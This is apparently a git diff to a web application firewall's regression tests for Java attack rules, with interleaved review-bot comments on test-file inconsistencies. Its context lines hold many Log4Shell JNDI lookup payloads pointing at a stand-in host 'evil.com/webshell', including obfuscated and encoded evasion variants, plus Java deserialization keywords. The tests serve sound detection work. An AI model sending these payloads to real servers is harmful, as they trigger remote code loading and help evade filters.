log: + expect_ids: [944150] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml index 9a57d7419..1c15911e4 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml @@ -3,7 +3,6 @@ # 944151 should detect the same things as 944151. meta: author: "dune73, Max Leske, azurit" - description: "Description" rule_id: 944151 tests: - test_id: 1 @@ -22,7 +21,8 @@ tests: data: foo=${jndi:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 2 desc: Log4J exploit on User-Agent stages: @@ -37,7 +37,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 3 desc: Log4J exploit in XML code stages: 
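Review bot: The hunk header for the first 944151.yaml hunk (`@@ -3,7 +3,6 @@`) quotes the file's top comment as `# 944151 should detect the same things as 944151.`, which is self-referential; the sibling file 944150.yaml carries `# 944151 should detect the same things as 944150.`, so this one presumably should read `# 944151 should detect the same things as 944150.` as well. The comment sits above the hunk's changed lines, so the commit does not touch it, but since the hunk already edits the `meta:` block directly below it this is the natural place to fix the copy-paste.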
@@ -54,7 +55,8 @@ tests: data: version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 4 desc: Log4J exploit in XML code stages: @@ -71,7 +73,8 @@ tests: data: "${jndi:ldap://evil.com/webshell}" version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: @@ -88,7 +91,8 @@ tests: data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: @@ -105,7 +109,8 @@ tests: data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: @@ -122,7 +127,8 @@ tests: data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: @@ -139,7 +145,8 @@ tests: data: foo=$\u007Bjndi:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: @@ -156,7 +163,8 @@ tests: data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: @@ -173,7 +181,8 @@ tests: data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: 
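Review bot: In the `@@ -54,7 +55,8 @@` hunk (test 3, `desc: Log4J exploit in XML code`) the `data:` context line has no value as rendered here, so the stage would post an empty body and the new `expect_ids: [944151]` would have nothing to match against. This is plausibly a rendering artifact (markup stripped from the page), since the quoted test-4 payload just below also shows no XML element, but if the file really contains a bare `data:` it parses as null; worth confirming the XML payload is present, and carrying it as a quoted string or a `|-` block scalar so it survives as text. The same bare `data:` shows in 944152.yaml's `@@ -54,7 +55,8 @@` hunk. The request stage of the test begins outside the hunk.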
@@ -190,7 +199,8 @@ tests: data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: @@ -207,7 +217,8 @@ tests: data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: @@ -224,7 +235,8 @@ tests: data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 14 desc: Log4J exploit on JSON with numeric HTML entity evasion stages: @@ -241,7 +253,8 @@ tests: data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: @@ -258,7 +271,8 @@ tests: data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: @@ -275,7 +289,8 @@ tests: data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: @@ -292,7 +307,8 @@ tests: data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: 
@@ -309,7 +325,8 @@ tests: data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion stages: @@ -326,7 +343,8 @@ tests: data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: @@ -343,7 +361,8 @@ tests: data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: @@ -360,7 +379,8 @@ tests: data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: @@ -377,7 +397,8 @@ tests: data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: @@ -393,7 +414,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: 
@@ -410,7 +432,8 @@ tests: data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151] - test_id: 25 desc: Log4J exploit on arg foo, with evasion stages:
@@ -427,4 +450,5 @@ tests: data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} version: "HTTP/1.1" output: - log_contains: id "944151" + log: + expect_ids: [944151]
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml
index 17d937eef..4621656e8 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml
@@ -3,7 +3,6 @@ # 944152 should detect the same things as 944152 and 944151. meta: author: "dune73, Max Leske, azurit" - description: "Description" rule_id: 944152 tests: - test_id: 1
@@ -22,7 +21,8 @@ tests: data: foo=${jndi:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 2 desc: Log4J exploit on User-Agent stages:
@@ -37,7 +37,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 3 desc: Log4J exploit in XML code stages:
@@ -54,7 +55,8 @@ tests: data: version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 4 desc: Log4J exploit in XML code stages:
@@ -71,7 +73,8 @@ tests: data: "${jndi:ldap://evil.com/webshell}" version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages:
@@ -88,7 +91,8 @@ tests: data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages:
@@ -105,7 +109,8 @@ tests: data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: @@ -122,7 +127,8 @@ tests: data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: @@ -139,7 +145,8 @@ tests: data: foo=$\u007Bjndi:ldap://evil.com/webshell} version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: @@ -156,7 +163,8 @@ tests: data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: @@ -173,7 +181,8 @@ tests: data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: @@ -190,7 +199,8 @@ tests: data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: @@ -207,7 +217,8 @@ tests: data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: 
@@ -224,7 +235,8 @@ tests: data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 14 desc: Log4J exploit on JSON with numeric HTML entity evasion stages: @@ -241,7 +253,8 @@ tests: data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: @@ -258,7 +271,8 @@ tests: data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: @@ -275,7 +289,8 @@ tests: data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: @@ -292,7 +307,8 @@ tests: data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: @@ -309,7 +325,8 @@ tests: data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion stages: 
@@ -326,7 +343,8 @@ tests: data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: @@ -343,7 +361,8 @@ tests: data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: @@ -360,7 +379,8 @@ tests: data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: @@ -377,7 +397,8 @@ tests: data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: @@ -393,7 +414,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: @@ -410,7 +432,8 @@ tests: data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 25 desc: Log4J exploit on arg foo, with evasion stages: 
@@ -427,7 +450,8 @@ tests: data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152] - test_id: 26 desc: Log4J exploit on arg foo, with evasion stages:
@@ -444,4 +468,5 @@ tests: data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}' version: "HTTP/1.1" output: - log_contains: id "944152" + log: + expect_ids: [944152]
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml
index a5af12663..8016cdce6 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml
@@ -1,7 +1,6 @@ --- meta: author: "spartantri" - description: "Description" rule_id: 944200 tests: - test_id: 1
@@ -12,4 +11,5 @@ tests: port: 80 encoded_request: "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" output: - log_contains: "id \"944200\"" + log: + expect_ids: [944200]
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml
index 01a32eea9..40cee4887 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml
@@ -22,7 +22,8 @@ tests: version: "HTTP/1.0" data: "test=rO0ABQ" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 2 desc: "Argument name includes keyword rO0ABQ" stages:
@@ -41,7 +42,8 @@ tests: version: "HTTP/1.0" data: "rO0ABQ=test" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 3 desc: "Cookie test includes keyword rO0ABQ" stages:
@@ -61,7 +63,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 4 desc: "Cookie name includes keyword rO0ABQ" stages: @@ -81,7 +84,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 5 desc: "Request header test includes keyword rO0ABQ" stages: @@ -101,7 +105,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 6 desc: "XML element includes keyword rO0ABQ" stages: @@ -120,7 +125,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944210\"" + log: + no_expect_ids: [944210] - test_id: 7 desc: "XML attribute name includes keyword rO0ABQ" stages: @@ -139,7 +145,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944210\"" + log: + no_expect_ids: [944210] - test_id: 8 desc: "XML attribute value includes keyword rO0ABQ" stages: @@ -158,7 +165,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 9 desc: "XML element value includes keyword rO0ABQ" stages: @@ -177,7 +185,8 @@ tests: version: "HTTP/1.0" data: "rO0ABQ" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 10 desc: "Nested XML element value includes keyword rO0ABQ" stages: @@ -196,7 +205,8 @@ tests: version: "HTTP/1.0" data: "rO0ABQ" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 11 desc: "Content-Type text/plain includes keyword rO0ABQ" stages: @@ -215,7 +225,8 @@ tests: version: "HTTP/1.0" data: "test=rO0ABQ" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 12 desc: "Content-Type application/json arg value includes keyword rO0ABQ" stages: 
@@ -234,7 +245,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"rO0ABQ\"}" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 13 desc: "Content-Type application/json arg name includes keyword rO0ABQ" stages: @@ -253,7 +265,8 @@ tests: version: "HTTP/1.0" data: "{\"rO0ABQ\": \"test\"}" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword rO0ABQ" stages: @@ -278,7 +291,8 @@ tests: {"rO0ABQ": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword rO0ABQ" stages: @@ -303,7 +317,8 @@ tests: {"rO0ABQ": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: @@ -328,7 +343,8 @@ tests: rO0ABQ -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: @@ -353,7 +369,8 @@ tests: rO0ABQ -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 18 desc: "Argument test includes keyword KztAAU" stages: @@ -372,7 +389,8 @@ tests: version: "HTTP/1.0" data: "test=KztAAU" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 19 desc: "Argument name includes keyword KztAAU" stages: @@ -391,7 +409,8 @@ tests: version: "HTTP/1.0" data: "KztAAU=test" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 20 desc: "Cookie test includes keyword KztAAU" stages: 
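Review bot: Tests 14 and 15 of 944210.yaml (hunks `@@ -278,7 +291,8 @@` and `@@ -303,7 +317,8 @@`) show the same multipart JSON part `{"rO0ABQ": "test"}` in their context lines, although test 15 is described as `json arg value includes keyword rO0ABQ`; as visible here only the argument-name placement is exercised, twice, and `expect_ids: [944210]` cannot tell the two apart because tests 12 and 13 show the rule firing on either placement. If the bodies really are identical, test 15's part should be `{"test": "rO0ABQ"}`, mirroring the non-multipart pair. The same duplication is visible for tests 31/32 (`{"KztAAU": "test"}`, hunks `@@ -628,7 +658,8 @@` and `@@ -653,7 +684,8 @@`) and tests 48/49 (`{"Cs7QAF": "test"}`, hunks `@@ -978,7 +1025,8 @@` and `@@ -1003,7 +1051,8 @@`). Each multipart body starts before its hunk, so only the last part is visible.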
@@ -411,7 +430,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 21 desc: "Cookie name includes keyword KztAAU" stages: @@ -431,7 +451,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 22 desc: "Request header test includes keyword KztAAU" stages: @@ -451,7 +472,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 23 desc: "XML element includes keyword KztAAU" stages: @@ -470,7 +492,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944210\"" + log: + no_expect_ids: [944210] - test_id: 24 desc: "XML attribute name includes keyword KztAAU" stages: @@ -489,7 +512,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944210\"" + log: + no_expect_ids: [944210] - test_id: 25 desc: "XML attribute value includes keyword KztAAU" stages: @@ -508,7 +532,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 26 desc: "XML element value includes keyword KztAAU" stages: @@ -527,7 +552,8 @@ tests: version: "HTTP/1.0" data: "KztAAU" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 27 desc: "Nested XML element value includes keyword KztAAU" stages: @@ -546,7 +572,8 @@ tests: version: "HTTP/1.0" data: "KztAAU" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 28 desc: "Content-Type text/plain includes keyword KztAAU" stages: @@ -565,7 +592,8 @@ tests: version: "HTTP/1.0" data: "test=KztAAU" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 29 desc: "Content-Type application/json arg value includes keyword KztAAU" stages: 
@@ -584,7 +612,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"KztAAU\"}" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 30 desc: "Content-Type application/json arg name includes keyword KztAAU" stages: @@ -603,7 +632,8 @@ tests: version: "HTTP/1.0" data: "{\"KztAAU\": \"test\"}" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 31 desc: "Content-Type multipart/form-data json arg name includes keyword KztAAU" stages: @@ -628,7 +658,8 @@ tests: {"KztAAU": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 32 desc: "Content-Type multipart/form-data json arg value includes keyword KztAAU" stages: @@ -653,7 +684,8 @@ tests: {"KztAAU": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 33 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: @@ -678,7 +710,8 @@ tests: KztAAU -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 34 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: @@ -703,7 +736,8 @@ tests: KztAAU -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 35 desc: "Argument test includes keyword Cs7QAF" stages: @@ -722,7 +756,8 @@ tests: version: "HTTP/1.0" data: "test=Cs7QAF" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 36 desc: "Argument name includes keyword Cs7QAF" stages: @@ -741,7 +776,8 @@ tests: version: "HTTP/1.0" data: "Cs7QAF=test" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 37 desc: "Cookie test includes keyword Cs7QAF" stages: 
@@ -761,7 +797,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 38 desc: "Cookie name includes keyword Cs7QAF" stages: @@ -781,7 +818,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 39 desc: "Request header test includes keyword Cs7QAF" stages: @@ -801,7 +839,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 40 desc: "XML element includes keyword Cs7QAF" stages: @@ -820,7 +859,8 @@ tests: version: "HTTP/1.0" data: "value" output: - no_log_contains: "id \"944210\"" + log: + no_expect_ids: [944210] - test_id: 41 desc: "XML attribute name includes keyword Cs7QAF" stages: @@ -839,7 +879,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - no_log_contains: "id \"944210\"" + log: + no_expect_ids: [944210] - test_id: 42 desc: "XML attribute value includes keyword Cs7QAF" stages: @@ -858,7 +899,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 43 desc: "XML element value includes keyword Cs7QAF" stages: @@ -877,7 +919,8 @@ tests: version: "HTTP/1.0" data: "Cs7QAF" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 44 desc: "Nested XML element value includes keyword Cs7QAF" stages: @@ -896,7 +939,8 @@ tests: version: "HTTP/1.0" data: "Cs7QAF" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 45 desc: "Content-Type text/plain includes keyword Cs7QAF" stages: @@ -915,7 +959,8 @@ tests: version: "HTTP/1.0" data: "test=Cs7QAF" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 46 desc: "Content-Type application/json arg value includes keyword Cs7QAF" stages: 
@@ -934,7 +979,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Cs7QAF\"}" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 47 desc: "Content-Type application/json arg name includes keyword Cs7QAF" stages:
@@ -953,7 +999,8 @@ tests: version: "HTTP/1.0" data: "{\"Cs7QAF\": \"test\"}" output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 48 desc: "Content-Type multipart/form-data json arg name includes keyword Cs7QAF" stages:
@@ -978,7 +1025,8 @@ tests: {"Cs7QAF": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 49 desc: "Content-Type multipart/form-data json arg value includes keyword Cs7QAF" stages:
@@ -1003,7 +1051,8 @@ tests: {"Cs7QAF": "test"} -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 50 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages:
@@ -1028,7 +1077,8 @@ tests: Cs7QAF -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210] - test_id: 51 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages:
@@ -1053,4 +1103,5 @@ tests: Cs7QAF -----------------------------thisissparta-- output: - log_contains: "id \"944210\"" + log: + expect_ids: [944210]
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml
index 72414303e..5b4807405 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml
@@ -22,7 +22,8 @@ tests: version: "HTTP/1.0" data: "test=runtime.clonetransformer" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 2 desc: "Argument name includes keyword runtime.clonetransformer" stages: @@ -41,7 +42,8 @@ tests: version: "HTTP/1.0" data: "runtime.clonetransformer=test" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 3 desc: "Cookie test includes keyword runtime.clonetransformer" stages: @@ -61,7 +63,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 4 desc: "Cookie name includes keyword runtime.clonetransformer" stages: @@ -81,7 +84,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944240\"" + log: + expect_ids: [944240] - test_id: 5 desc: "Request header test includes keyword runtime.clonetransformer" stages: @@ -101,7 +105,8 @@ tests: version: 